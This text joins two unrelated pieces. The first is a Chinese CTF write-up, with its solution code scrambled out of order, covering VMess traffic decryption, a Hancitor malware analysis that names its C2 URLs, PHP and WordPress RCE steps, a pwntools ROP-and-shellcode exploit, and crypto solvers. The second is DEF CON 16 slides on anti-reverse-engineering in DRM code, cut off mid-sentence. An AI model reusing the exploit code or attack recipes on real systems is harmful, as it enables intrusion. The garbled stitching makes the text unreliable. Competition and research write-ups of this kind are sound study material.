tmp        print(len(tmp))    C = matrix(ZZ, data) A = matrix(ZZ,m+r,m+r) for i in range(m):    A[i,i] = 1 for i in range(r):    for j in range(m):        A[j,i+m] = C[i,j]<<200    A[i+m,i+m] = N<<200 ans = A.LLL() B = matrix(ZZ,n,m) for i in range(n):    assert list(ans[i][m:]) == [0]*r    B[i] = ans[i][:m] # print(B) ans = B.right_kernel().basis() D = matrix(ZZ,ans) Misc 谍影重重 给了⼀个config.json,⾥⾯只有个UUID,搜了⼀下发现是V2Ray常⽤的⼀个UUID,所以应该是VMess流量分析 ⼀开始是看到了这个官⽅⽂档,https://www.v2ray.com/developer/protocols/vmess.html,然后先去解请求包的 指令部分,发现Python的AES-CFB不太⾏,就⽤Golang写了 从https://github.com/jarvisgally/v2simple抄了点代码 # print(D) print('result=') from base64 import b64decode res = D.BKZ(block_size=12)[0] key1 = sha256(str(res).encode()).digest() key2 = sha256(str(-res).encode()).digest() c = 'rX4K8nZnib5PN13ct6AMwTos99Vdnu7gxsdLMZekKu7gEKx862hL9voPRJS+GzGm' c = b64decode(c) aes = AES.new(key1, AES.MODE_ECB) print(aes.decrypt(c)) aes = AES.new(key2, AES.MODE_ECB) print(aes.decrypt(c)) package main import ( "bytes" "crypto/md5" "encoding/binary" "encoding/hex" "strings" "errors" "math/bits" "sync" "fmt" "crypto/aes" "crypto/cipher" ) func init() { bufPools = InitBufPools() writeBufPool = InitWriteBufPool() } // // Read buffer // var bufPools []sync.Pool func InitBufPools() []sync.Pool { pools := make([]sync.Pool, 17) // 1B -> 64K for k := range pools { i := k pools[k].New = func() interface{} { return make([]byte, 1<<uint32(i)) } } return pools } func msb(size int) uint16 { return uint16(bits.Len32(uint32(size)) - 1) } func GetBuffer(size int) []byte { if size <= 0 || size > 65536 { return nil } bits := msb(size) if size == 1<<bits { return bufPools[bits].Get().([]byte)[:size] } return bufPools[bits+1].Get().([]byte)[:size] } func PutBuffer(buf []byte) error { bits := msb(cap(buf)) if cap(buf) == 0 || cap(buf) > 65536 || cap(buf) != 1<<bits { return errors.New("incorrect buffer size") } bufPools[bits].Put(buf) return nil } // // Write buffer // var writeBufPool sync.Pool func InitWriteBufPool() sync.Pool { return sync.Pool{ New: func() interface{} { return &bytes.Buffer{} }, } } func GetWriteBuffer() *bytes.Buffer { return writeBufPool.Get().(*bytes.Buffer) } func PutWriteBuffer(buf *bytes.Buffer) { buf.Reset() writeBufPool.Put(buf) } // StrToUUID converts string to uuid func StrToUUID(s string) (uuid [16]byte, err error) { b := []byte(strings.Replace(s, "-", "", -1)) if len(b) != 32 { return uuid, errors.New("invalid UUID: " + s) } _, err = hex.Decode(uuid[:], b) return } // GetKey returns the key of AES-128-CFB encrypter // Key:MD5(UUID + []byte('c48619fe-8f02-49e0-b9e9-edf763e17e21')) func GetKey(uuid [16]byte) []byte { md5hash := md5.New() md5hash.Write(uuid[:]) md5hash.Write([]byte("c48619fe-8f02-49e0-b9e9-edf763e17e21")) return md5hash.Sum(nil) } // TimestampHash returns the iv of AES-128-CFB encrypter // IV:MD5(X + X + X + X),X = []byte(timestamp.now) (8 bytes, Big Endian) func TimestampHash(unixSec int64) []byte { ts := GetBuffer(8) defer PutBuffer(ts) binary.BigEndian.PutUint64(ts, uint64(unixSec)) md5hash := md5.New() md5hash.Write(ts) md5hash.Write(ts) md5hash.Write(ts) md5hash.Write(ts) return md5hash.Sum(nil) } func main() { fmt.Println("111"); var t int64 t = 1615528962 - 100 var i int64 for i = 0; i < 200; i += 1 { uuid, _ := StrToUUID("b831381d-6324-4d53-ad4f-8cda48b30811") block, _ := aes.NewCipher(GetKey(uuid)) var buf []byte buf, _ = hex.DecodeString("b48b35bf592c09b21545392f73f6cef91143786464578c1c361aa72f638cd0135f253 43555f509aef6c74cd2a2b86ee0a9eb3b93a81a541def4763cc54f91ba02681add1b815e8c50e028c76bde0 ee8a9593db88d901066305a51a9586a9e377ee100e7d4d33fcfc0453c86b1998a95275cd9368a68820c2a6a 540b6386c146ea7579cfe87b2e459856772efdcf0e4c6ab0f11d018a15561cf409cbc00491d7f4d22b7c486 a76a5f2f25fbef503551a0aeb90ad9dd246a9cc5e0d0c0b751eb7b54b0abbfef198b1c4e5e755077469c318 f20f3e418af03540811ab5c1ea780c886ea2c903b458a26") stream := cipher.NewCFBDecrypter(block, TimestampHash(t + i)) stream.XORKeyStream(buf, buf) if buf[0] == 1 { fmt.Println(buf[0]) fmt.Println(buf) } } } 数据应该是 根据协议读⼀下这个数据,应该只到第55byte为⽌,后⾯不⽤解密,按照⽂档可以读出来在校验值之前加⼊6 字节 的随机值,加密⽅式是ChaCha20-Poly1305,⽬标服务器地址127.0.0.1:5000,还可以拿到密钥和IV的信息。 但是按照这个解密⽅法解不出来,再去仔细看数据包,发现协议头⾥⾯有⼀个⽂档⾥没写的Opt, RequestOptionGlobalPadding,得看下v2ray源码。 读了⼀下源码,发现当开启这个opt的时候,每⼀个包会多取⼀次随机⻓度的padding,⻓度是根据那个shake hash的值确定的,所以会多使⽤2bytes的hash,所以第⼀组取的hash应该是第3和第4个byte,以此类推。同时还 发现⽂档有问题,审计了⼀下源码发现3是AES-GCM,⽽不是⽂档⾥⾯说的ChaCha20-Poly1305,换了算法终于可 以把请求包解出来了 然后照葫芦画瓢解响应的数据包 data = [1,19,39,127,87,50,218,82,173,167,144,216,123,136,41,218,169,94,74,154,169,186,88,199,2 27,173,54,254,36,153,220,162,89,162,13,99,0,1,19,136,1,127,0,0,1,26,206,125,155,176,181 ,57,24,44,3,129,170,64,93,17,45,93,29,193,211,62,197,142,68,107,21,31,51,49,205,82,9,21 0,93,27,6,95,168,117,68,134,229,113,88,76,70,250,125,14,228,67,235,105,171,244,102,194, 131,73,233,2,9,35,204,143,71,47,29,32,187,224,86,135,183,32,226,204,143,171,77,193,115, 194,50,214,200,21,203,124,117,198,189,116,210,226,165,118,56,239,253,17,255,0,156,54,56 ,76,67,27,18,62,209,36,150,94,33,138,121,207,185,17,85,252,85,184,31,175,113,106,239,18 1,131,40,242,149,231,110,53,45,17,233,3,23,174,141,32,144,56,174,112,209,158,226,245,11 9,196,132,29,119,220,66,100,49,8,138,148,50,68,245,10,243,162,255,223,69,184,255,33,11, 44,79,245,81,7,97,39,250] GET /out HTTP/1.1 Host: User-Agent: curl/7.75.0 Accept: */* Connection: close import hashlib import hmac import struct from Crypto.Cipher import AES from Crypto.Cipher import ChaCha20_Poly1305 import binascii import fuckpy3 from fnvhash import fnv1a_32 data = [1,19,39,127,87,50,218,82,173,167,144,216,123,136,41,218,169,94,74,154,169,186,88,199,2 27,173,54,254,36,153,220,162,89,162,13,99,0,1,19,136,1,127,0,0,1,26,206,125,155,176,181 ,57,24,44,3,129,170,64,93,17,45,93,29,193,211,62,197,142,68,107,21,31,51,49,205,82,9,21 0,93,27,6,95,168,117,68,134,229,113,88,76,70,250,125,14,228,67,235,105,171,244,102,194, 131,73,233,2,9,35,204,143,71,47,29,32,187,224,86,135,183,32,226,204,143,171,77,193,115, 194,50,214,200,21,203,124,117,198,189,116,210,226,165,118,56,239,253,17,255,0,156,54,56 ,76,67,27,18,62,209,36,150,94,33,138,121,207,185,17,85,252,85,184,31,175,113,106,239,18 1,131,40,242,149,231,110,53,45,17,233,3,23,174,141,32,144,56,174,112,209,158,226,245,11 9,196,132,29,119,220,66,100,49,8,138,148,50,68,245,10,243,162,255,223,69,184,255,33,11, 44,79,245,81,7,97,39,250] print(len(data)) msg = bytes(data) print(msg) ver = msg[0] iv = msg[1:17] key = msg[17:33] v = msg[33:34] print("V ", binascii.hexlify(v)) opt = msg[34:35] print("opt ", binascii.hexlify(opt)) psec = msg[35:36] print("P|sec ", binascii.hexlify(psec)) rev = msg[36] cmd = msg[37:38] print("cmd ", binascii.hexlify(cmd)) port = msg[38:40] T = msg[40] ip = msg[41:45] _ = msg[45:51] h = msg[51:55] print(binascii.hexlify(h)) print(hex(fnv1a_32(msg[:51]))) data = open('data', 'rb').read() # print(binascii.hexlify(data)) # print(binascii.hexlify(key)) # print(binascii.hexlify(iv)) key = hashlib.md5(key).digest() iv = hashlib.md5(iv).digest() shake = hashlib.shake_128(iv).digest(10000) print(binascii.hexlify(shake)) outfile = open('out', 'wb') ptr = 0 shake_ptr = 0 count = 0 while (ptr < len(data)):   padding_size = (int(shake[shake_ptr] << 8) | (shake[shake_ptr + 1])) % 64   l = data[ptr:ptr+2]   x = int(binascii.hexlify(l), 16)   y = (shake[shake_ptr + 2] << 8) | (shake[shake_ptr + 3])   # y = 0x5971   length = x ^ y   print(hex(ptr), hex(x), hex(y), hex(length), padding_size)   nonce = struct.pack('>h', count) + iv[2:12]   aes = AES.new(key, AES.MODE_GCM, nonce)   # aes.decrypt(b'\x00' * total_length)   plain = aes.decrypt(data[ptr+2:ptr+2+length-padding_size-16])   # plain = aes.decrypt_and_verify(data[ptr+2:ptr+2+length-padding_size-16], data[ptr+2+length-padding_size-16:ptr+2+length-padding_size])   # print(plain)   outfile.write(plain)   count += 1   ptr += length + 2   # print(binascii.hexlify(data[2023:2028]))   shake_ptr += 4   # break outfile.close() 解出来⼀个HTML,html⽤blob保存了⼀个DOC,⾥⾯有宏,分析⼀下发现在Templates⽬录下⾯释放了⼀个 W0rd.dll,⽤Rundll32起了UminslaIIF0mt函数 这个实际上是Hancitor恶意软件,DLL⾥⾯RC4解密了很多东⻄,⾥⾯就有URL 提出了这个字符串http://satursed.com/8/forum.php|http://sameastar.ru/8/forum.php|http://ludiesibut.ru/8/ forum.php|,提示解压密码是c2 api的地址,但是这3个都是c2。尝试了各种排列组合都不太对,最后发现是 api.ipify.org的MD5,这东⻄确实访问过,但是只是⽤来查本机ip的,这是c2??? 解压出来是⼀个golang的gob,不知道数据类型,得猜⼀猜,应该是字符串的数组或者map。最后发现是 map[string][]byte,解出来⾥⾯没什么东⻄,就知道是⼀个PNG⽂件,然后有⼀⼤块很乱的raw data,⽂件内容看 上去也不像PNG的特征。 这时候放了个新提示,说⽂件内容被随机打乱了。⽂件⾥⾯有个时间戳,然后还是个gob,可能是⽤golang打乱 的,脑洞⼀下,⽤这个时间戳的时间srand,然后rand.Shuffle exit() package main import ( // "encoding/gob" "fmt" // "os" "math/rand" "time" ) func main() { rand.Seed(1658213396) t := time.Now().Unix() buffer := make([]int, 0x1134b) for i := 0; i < 0x1134b; i++ { buffer[i] = i } fmt.Println(t) rand.Shuffle(len(buffer), func(i, j int) { buffer[i], buffer[j] = buffer[j], buffer[i] }) fmt.Println(buffer) } 解出来⼀张图⽚,上⾯写着flag not here,查看各个通道发现alpha通道的颜⾊很诡异,提取⼀下数据发现除了0xff 以外是组成flag的字符,试⼀下各种顺序,发现先遍历列再遍历⾏可以得到顺序正确的flag 强⽹先锋 x = [...] # 这⾥是golang排出来的顺序 data = open('flag.png', 'rb').read() flag = ['\x00'] * 0x1134b for i in range(0x1134b):   flag[x[i]] = data[i] flag = ''.join(flag) open('flag2.png', 'wb').write(flag) from PIL import Image image = Image.load("flag2.png") alpha = image.split()[-1].load() for y in range(973):   for x in range(2000):       pixel = alpha[x, y]       if pixel != 255:           print(x, y, pixel, chr(pixel)) rcefile www.zip spl_autoload_register 会⾃动include inc⽂件 传⼀个扩展名为inc的png⽂件,然后cookie序列化⼀个上传⽂件名的类 再访问/showfile.php,设置cookie,rce。 polydiv sage建个GF2上的polynomial直接秒了 from pwn import * import requests import json import os import gmpy2 from pwnlib.tubes.tube import * from hashlib import * from Crypto.Util.number import * from tqdm import tqdm, trange import random import math from Crypto.Hash import SHA256 from Crypto.Cipher import AES from factordb.factordb import FactorDB from sage.modules.free_module_integer import IntegerLattice import itertools from fastecdsa.curve import Curve from random import getrandbits, shuffle, randint def resultant(p1, p2, var):   p1 = p1.change_ring(QQ)   p2 = p2.change_ring(QQ)   var = var.change_ring(QQ)   r = p1.resultant(p2, var)   return r.change_ring(F) r = remote('', '19962') context(log_level='debug') ALPHABET = string.ascii_letters + string.digits rec = r.recvline().decode() print(rec) suffix = rec[rec.find('+'):rec.find(')')][1:].strip() digest = rec[rec.find('==')+3:-1].strip() print(f"suffix: {suffix} \ndigest: {digest}") for i in itertools.product(ALPHABET, repeat=4):   prefix = ''.join(i)   guess = prefix + suffix devnull 栈溢出,但是没有合适的ROP   if sha256(guess.encode()).hexdigest() == digest:       # log.info(f"Find XXXX: {prefix}")       print((f"Find XXXX: {prefix}"))       break r.sendline(prefix.encode()) P.<x> = PolynomialRing(GF(2)) for i in range(41):   r.recvuntil('r(x) = ')   rx = P(r.recvline().decode().strip())   print(rx)   r.recvuntil('a(x) = ')   ax = P(r.recvline().decode().strip())   print(ax)   r.recvuntil('c(x) = ')   cx = P(r.recvline().decode().strip())   print(cx)   bx = (rx - cx) / ax   r.sendlineafter('> b(x) = ', str(bx)) #!/usr/bin/env python3 # -*- coding=utf-8 -*- from pwn import * DEBUG = 0 def main():    if DEBUG:        p = process("./devnull")        context.log_level = "debug"    else:        p = remote("", 40022)    p.readuntil(b"please input your filename") WP-UM 看源码装了usermeta插件,搜到⽂章https://wpscan.com/vulnerability/9d4a3f09-b011-4d87-ab63-332e505cf1 cd,根据题⽬意图侧信道爆破⽤户名密码即可,进后台插件shell,flag在usr⽬录下 AVR 因为n是4个128bit⼩素数平⽅的乘积,尝试喂给yafu分解sqrt(n),分出来四个⼩素数    pause()    p.send(b"a" * 0x20)    p.readuntil(b"discard\n")    ret1 = 0x401511 # leave; ret    payload1 = b"c" * 0x14 + p64(0x3fe000) + p64(0x3fe000) + p64(ret1)    p.send(payload1)    p.readuntil(b"new data\n")    # gadget1: 0x0000000000401351 : mov eax, dword ptr [rbp - 0x18] ; leave ; ret    gadget1 = 0x0000000000401351    # gadget2: 0x4012D0 : mov esi, 1000h ; mov rdi, rax ;call _mprotect ; nop ; pop rbp ; retn    gadget2 = 0x4012D0    # gadget3: 04014CE : mov eax, cs:size_0x60 ; movsxd rdx, eax ; mov rcx, [rbp-8] ; mov eax, [rbp-20h] ; mov rsi, rcx ; mov edi, eax ;    gadget3 = 0x4014CE    rbp2 = 0x3fe000 + 0x20    rbp3 = 0x3fe000 + 0x48    eax = 0x3fe000    payload2 = p64(0x3fe000 + 0x18 + 0x18) + p64(gadget1) + p64(rbp2) + p64(eax) + p64(0) * 2 + p64(0) + p64(gadget2) + p64(rbp3)    payload2 += p64(gadget3) + p64(0) + p64(0)    p.send(payload2)    p.readuntil(b"Thanks\n")    shellcode = b'hflagj\x02XH\x89\xe71\xf6\x0f\x05A\xba\xff\xff\xff\x7fH\x89\xc6j(Xj\x02_\x99\x0f\x05'    payload3 = p64(0x3fe050) + shellcode    pause()    p.send(payload3)    p.interactive() if __name__ == "__main__":    main() from pwn import * import string import base64 import math from libnum import * import gmpy2 import os import json # import random from libnum import xgcd, solve_crt from tqdm import tqdm from hashlib import sha256, md5, sha1 from Crypto.Hash import SHA256 from Crypto.PublicKey import DSA from Crypto.Cipher import AES, DES from itertools import product from sage.all import * from Crypto.Util.number import * import randcrack import random from sm4 import SM4Key # # r = remote('hiyoko.quals.seccon.jp', '10042') # # # context(log_level='debug') # ALPHABET = string.ascii_letters + string.digits # rec = r.recvline().decode().replace(' ', '') # print(rec) # rec = rec[rec.find('+')+1::] # suffix = rec[rec.find('+')+1:rec.find(')')] # digest = rec[rec.find('==')+2:-1] # print(f"suffix: {suffix} \ndigest: {digest}") # for i in product(ALPHABET, repeat=5): #     prefix = ''.join(i) #     guess = prefix + suffix #     if md5(guess.encode()).hexdigest()[0:5] == digest: #         log.info(f"Find XXXX: {prefix}") #         break # r.sendline(prefix.encode()) # r.interactive() # r.recvline() n = 825087128028157397936509571571135911537250445897344436708319543186130753456324653736424 810410649459808198821658443200319919880575372144845091130855804111546590017923079893961 558351775626555781471041915746272179386453223904275880829857552266635835272606057819404 5804198551989679722201244547561044646931280001 e = 3 c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003 971821843069272938250385935597609059700446530436381124650731751982419593070224310399320 617914955227288662661442416421725698368791013785074809691867988444306279231013360024747 585261790352627234450209996422862329513284149 pad = lambda s:s + bytes([(len(s)-1)%16+1]*((len(s)-1)%16+1)) nn = isqrt(n) p = 225933944608558304529179430753170813347 nnn = 58168156707034554506999754297878805611645169757838644738807204999343153499547 q = nn // p // nnn assert n % p == 0 and n % q == 0 r = 223213222467584072959434495118689164399 s = 260594583349478633632570848336184053653 assert p**2*q**2*r**2*s**2 == n phi = r*(r-1)*s*(s-1) d = inverse(e, phi) m = pow(c, d, r**2*s**2) print(long_to_bytes(int(m)))
Introduction SEH Basics Anti-RE Techniques Decrypting the Content Anti-RE Techniques in DRM Code Jan Newger Seminar on Advanced Exploitation Techniques i4, RWTH Aachen, Germany DEF CON 16 / 2008 Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk Legal Issues Legal issues with publishing DRM research Probably illegal in most countries, legal uncertainty Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk Legal Issues Legal issues with publishing DRM research Probably illegal in most countries, legal uncertainty EFF to the Rescue! Electronic Frontier Foundation (EFF)[1] Non-profit organization dedicated to preserving free speech rights Discussed solution with Jennifer Granick from EFF (thx Jennifer!) Loophole in DMCA -> "Encryption Research"[2] But still too dangerous for me Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk (2) Consequence Strip details about key setup and decryption algorithm Don’t reveal identity of the DRM Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk (2) Consequence Strip details about key setup and decryption algorithm Don’t reveal identity of the DRM What it IS Show some not-so-common Anti-RE techniques Strategies to defeat Anti-RE Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk (2) Consequence Strip details about key setup and decryption algorithm Don’t reveal identity of the DRM What it IS Show some not-so-common Anti-RE techniques Strategies to defeat Anti-RE What it is NOT How to hack the DRM from ********* No tutorial for writing decryption tools Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM What’s a DRM? "Digital Rights Management" Restrict access to content Content encrypted Decrypt online Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM What’s a DRM? "Digital Rights Management" Restrict access to content Content encrypted Decrypt online Key often bound to user/hardware Prevents copying Change hardware -> new license Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM What’s a DRM? "Digital Rights Management" Restrict access to content Content encrypted Decrypt online Key often bound to user/hardware Prevents copying Change hardware -> new license Media key, hardware key, player key, content key... Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM What’s a DRM? "Digital Rights Management" Restrict access to content Content encrypted Decrypt online Key often bound to user/hardware Prevents copying Change hardware -> new license Media key, hardware key, player key, content key... Obviously: every DRM can be broken Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Possible Strategies (1) Ultimate Goal Find code for content decryption and the associated key setup Obvious Approach 1 BPs on file I/O APIs (CreateFile, ReadFile, MMF) 2 Set BPM on filebuffer either stops on copy operation or breaks on decryption Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Possible Strategies (1) Ultimate Goal Find code for content decryption and the associated key setup Obvious Approach 1 BPs on file I/O APIs (CreateFile, ReadFile, MMF) 2 Set BPM on filebuffer either stops on copy operation or breaks on decryption Obvious approach impossible! DRM System prevents this strategy by blocking the debug registers! Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Possible Strategies (2) Code Coverage Runtime analysis to spot relevant code by recording execution of basic blocks / functions Code Coverage Limitation Here: Impossible to find DRM code itself using code coverage! Gives some good starting points, though Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Basic Approach Summary Our Strategy Use code coverage to spot some places to investigate Use obvious approach to find decryption code Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching Windows SEH Structured Exception Handling Dispatch exception on a per-thread-basis Linked list of handlers starting at fs:[0] On exception OS walks list of faulting thread When called, a handler can: Handle exception and ask OS to continue execution Refuse to handle exception Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching SEH Handler EXCEPTION_DISPOSITION _except_handler(_EXCEPTION_RECORD* ExceptionRecord, void* EstablisherFrame, _CONTEXT* ContextRecord, void* DispatcherContext); Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching SEH Handler Invocation Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching SEH Handler Invocation Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching SEH Handler Invocation Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching SEH Handler Invocation Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching SEH Handler Invocation Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Exception Dispatching Remarks SEH Handler Invocation Simplified view, because No stack unwinding No collided unwind, nested exceptions Handler can decide not to return (C++, try...except) But good enough for our analysis! Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine The DRM Protection (1) Control Flow Obfuscation Use fake exceptions to interrupt control flow Handlers change thread context Inter-/intra-modular calls through call tables Use dynamically allocated trampolines P-Code machine Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine The DRM Protection (2) Anti-Debugging Check PEB flag Scan APIs for 0xCC Usage of debug registers (no BPM/BPX) Special files contain code uncompressed at runtime Use fake exceptions to detect debugger Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampolines Overview Trampoline Definition Copy code at runtime to randomized location (RDTSC), execute from there Trampoline Execution 1 Change control flow via fake exceptions (single step exception) 2 Exception handler modifies EIP based on debug register values 3 Execution resumes at next trampoline Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Trampoline Control Flow Trampoline A transfers control flow to trampoline B Control flow entirely depends on jumps and exceptions No call or ret instructions, no direct control flow between trampolines Therefore, a call hierarchy emulation is implemented Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Trampoline0 TrampolineA copies trampoline0 and jumps to it Trampoline0 manages internal call hierarchy Put destination trampoline on stack Copies next trampoline to random location Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Trampoline1 Copy trampoline0 to random location Install SEH frame and trigger single step exception Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Trampoline1 Copy trampoline0 to random location Install SEH frame and trigger single step exception Trigger Exception pushf pop eax or eax, 100h push eax popf Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Exception Handler Changes EIP based on debug register values Clear TF bit, remove SEH frame, clean stack Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Trampoline2 Copy destination trampoline Jump to destination trampoline Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Trampoline Details Call Stack Emulation The ret instruction is emulated by a similar mechanism! Special exception handler removes trampoline from internal call stack Modifies context, execution resumes Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine More Trampoline Details Use of the Debug Registers DR0 and DR6 are zeroed out DR1 contains pointer to a shared stack area to pass data between trampolines DR2 holds trampoline address, which is used to perform return emulation DR3 holds the address of the starting trampoline (trampoline0) DR7 is used to turn hardware breakpoints on and very frequently Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Impact of Trampolines Impact on RE Debugging pretty annoying, trampoline addresses jitter Control flow depends on DRs, so no BPM/BPX No call stack, i.e. back tracing difficult We can´t execute until return, difficult to tell who called us No direct call between subs, less X-Refs Absence of ret instructions confuses disassembler Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Impact of Trampolines Impact on RE Debugging pretty annoying, trampoline addresses jitter Control flow depends on DRs, so no BPM/BPX No call stack, i.e. back tracing difficult We can´t execute until return, difficult to tell who called us No direct call between subs, less X-Refs Absence of ret instructions confuses disassembler But: Once understood we get perfect call stack Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Ease Impact of Trampolines Idea Fix trampoline addresses Use kernel mode driver Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Ease Impact of Trampolines Idea Fix trampoline addresses Use kernel mode driver Driver 1 Turn RDTSC into privileged instruction (TSD flag, CR4 register) 2 Hook IDT 3 Return zero upon exception if Exception from user mode Instruction was RDTSC else jump to original handler Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Reclaiming the Debug Registers (1) Usage of DRs DRM system uses DRs for storage Uses SetThreadContext API Debugger cannot use hardware breakpoints (crash or no break) Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Reclaiming the Debug Registers (1) Usage of DRs DRM system uses DRs for storage Uses SetThreadContext API Debugger cannot use hardware breakpoints (crash or no break) Strategy But we need BPMs for our strategy! Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Reclaiming the Debug Registers (2) Use API Hooking Hook into Set/GetThreadContext API Redirect modifications to internal storage DRM System cannot modify DRs anymore! Debugger can use DRs Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Reclaiming the Debug Registers (2) Use API Hooking Hook into Set/GetThreadContext API Redirect modifications to internal storage DRM System cannot modify DRs anymore! Debugger can use DRs Really? Hardware breakpoints still don’t work! Why? Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Context Emulation Problem Modification of EIP depends on DRs Two thread contexts: kernel mode vs. internal storage Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Context Emulation Problem Modification of EIP depends on DRs Two thread contexts: kernel mode vs. internal storage Hook KiUserExceptionDispatcher If fake exception, execute re-implemented 